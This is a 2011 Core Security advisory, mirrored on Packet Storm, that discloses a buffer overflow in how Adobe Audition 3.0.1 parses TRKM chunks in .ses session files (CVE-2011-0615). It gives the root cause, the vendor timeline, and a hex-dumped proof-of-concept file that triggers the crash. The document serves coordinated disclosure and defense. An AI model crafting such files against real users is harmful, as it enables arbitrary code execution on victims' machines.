exploit the possibilities

Core Security Technologies Advisory 2011.0204

Core Security Technologies Advisory 2011.0204
Posted May 12, 2011
Authored by Core Security Technologies, Diego Juarez, Eduardo Koch, Laura Balian | Site coresecurity.com

Core Security Technologies Advisory - Adobe Audition is vulnerable to numerous buffer overflows while parsing several fields inside the TRKM chunk on session (.ses) files. Then, a memory corruption can be leveraged to execute arbitrary code on vulnerable systems by enticing users to open specially crafted session files.

tags | exploit, overflow, arbitrary
advisories | CVE-2011-0615
MD5 | 7b91488b5d62aa1fd73cf0106c145262

Core Security Technologies Advisory 2011.0204

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

Adobe Audition vulnerability processing malformed session file



1. *Advisory Information*

Title: Adobe Audition vulnerability processing malformed session file
Advisory ID: CORE-2011-0204
Advisory URL:
http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file
Date published: 2011-05-12
Date of last update: 2011-05-12
Vendors contacted: Adobe
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-0615



3. *Vulnerability Description*

Adobe Audition is a digital audio workstation software for Windows that
was originally developed by Syntrillium as Cool Edit Pro, and acquired
by Adobe in 2003. The software allows user to do multitrack audio mixing
and editing and supports storing of multitrack audio using a session
file format (.ses).

Adobe audition is vulnerable to numerous buffer overflows while parsing
several fields inside the TRKM chunk on session (.ses) files. Then, a
memory corruption can be leveraged to execute arbitrary code on
vulnerable systems by enticing users to open specially crafted session
files.

This vulnerability could be used by a remote attacker to execute
arbitrary code with the privileges of the user that opened the malicious
file.


4. *Vulnerable packages*

. Adobe Audition 3.0.1.
. Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

. Adobe Audition CS5.5.


6. *Vendor Information, Solutions and Workarounds*

Adobe strongly recommends Audition users discontinue use of the Adobe
Session (.ses) file format and switch to use of the XML session format.
With the release of Audition CS5.5, the binary Audition Session (.ses)
file format is no longer supported.


7. *Credits*

These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and
Laura Balian from Core Security Technologies. Additional research,
exploitability analysis and PoC were made by Diego Juarez from Core
Exploit Writers Team.


8. *Technical Description / Proof of Concept Code*

Adobe audition is vulnerable to numerous buffer overflows while parsing
several fields inside the 'TRKM' chunk on session (.ses) files.

The vulnerability comes from passing a wrongly assumed max buffer size
to the function found at address 0x483F065A. This function has a
prototype similar to this:

/-----
unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src);
- -----/
The 'size' parameter is assumed to be in WCHARs but (while parsing
session files) the code uses it as a size expressed in bytes, leading to
multiple buffer overflows in several fields in the 'TRKM' chunk of the
session file.


8.1. *Proof of Concept*

The following (dumped) .ses file should trigger the vulnerability.

/-----

00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ?
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?'
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001E0: 41 - - - A

- -----/



9. *Report Timeline*

. 2011-02-03:
Core Advisories Team notifies Adobe PSIRT several crashes in Adobe
Audition and asks for technical assistance in order to determine if
these crashes can result into a security vulnerability.

. 2011-02-03:
Vendor acknowledges reception of the last email and notifies that the
Adobe tracking number 850 was opened to track this issue.

. 2011-02-24:
Core notifies that there has been no communication in the last 3 weeks
and asks for a status update about the reported crashes.

. 2011-02-28:
Adobe PSIRT notifies that the file format affected by the issue will no
longer be supported with the next release of Audition, planned for May
2011. Vendor also notifies their plan to publish a Security Bulletin,
including an acknowledgement for this report.

. 2011-03-09:
Core notifies that the impact of these bugs is not clear and requests
technical information to understand the nature and root cause of the
reported crashes rather than purely information about Adobe release
decisions. Core also requires Adobe to clarify if this bug is considered
exploitable and asks if patches or fixes are going to be released as well.

. 2011-03-16:
Core asks for a status update.

. 2011-03-16:
PSIRT notifies that they have not done any analysis to determine if this
issue is exploitable because:

1. The .ses file format is an older format that will not be supported
with the next release.
2. The .ses files store information about a recording session; they
are not typically exchanged between parties over email, and are even
less likely to be accepted and opened from non-trusted sources.
3. Adobe has been encouraging people to use XML files in place of the
binary .ses file format for the last year [1].
4. The installed base for Audition is small compared with
higher-profile Adobe products.

For the above mentioned reasons, vendor considers that it is not a high
priority to perform a vulnerability analysis. Vendor also notifies that
they are currently planning to publish a Security Bulletin in May 2011
with the release of the next major version of Audition.

. 2011-04-04:
Core notifies that additional research was done by Diego Juarez and the
reported flaws seem to be exploitable. Core notifies the advisory will
be released when these Adobe patches become available.

. 2011-04-04:
Vendor notifies that the Adobe ID 897 was opened to track this case and
they are on track for releasing patches in May.

. 2011-04-28:
Core notifies that the advisory publication was rescheduled to May 10th
and requests confirmation for a coordinated release. Core also requests
further information regarding the affected and patched versions numbers.

. 2011-05-05:
Vendor notifies that these issues should be resolved in the upcoming
release of Adobe Audition planned for May 10th.

. 2011-05-06:
Vendor notifies that due to a last minute change, the release was
tentatively rescheduled for May 12th.

. 2011-05-06:
Core reschedules advisory publication for May 12th.

. 2011-05-12:
Advisory CORE-2011-0204 is published.



10. *References*

[1]
http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html.



11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d
=EybH
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

July 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    12 Files
  • 3
    Jul 3rd
    1 Files
  • 4
    Jul 4th
    2 Files
  • 5
    Jul 5th
    34 Files
  • 6
    Jul 6th
    21 Files
  • 7
    Jul 7th
    21 Files
  • 8
    Jul 8th
    13 Files
  • 9
    Jul 9th
    6 Files
  • 10
    Jul 10th
    1 Files
  • 11
    Jul 11th
    3 Files
  • 12
    Jul 12th
    15 Files
  • 13
    Jul 13th
    19 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    15 Files
  • 16
    Jul 16th
    9 Files
  • 17
    Jul 17th
    2 Files
  • 18
    Jul 18th
    2 Files
  • 19
    Jul 19th
    19 Files
  • 20
    Jul 20th
    21 Files
  • 21
    Jul 21st
    53 Files
  • 22
    Jul 22nd
    14 Files
  • 23
    Jul 23rd
    14 Files
  • 24
    Jul 24th
    1 Files
  • 25
    Jul 25th
    1 Files
  • 26
    Jul 26th
    21 Files
  • 27
    Jul 27th
    8 Files
  • 28
    Jul 28th
    9 Files
  • 29
    Jul 29th
    12 Files
  • 30
    Jul 30th
    9 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close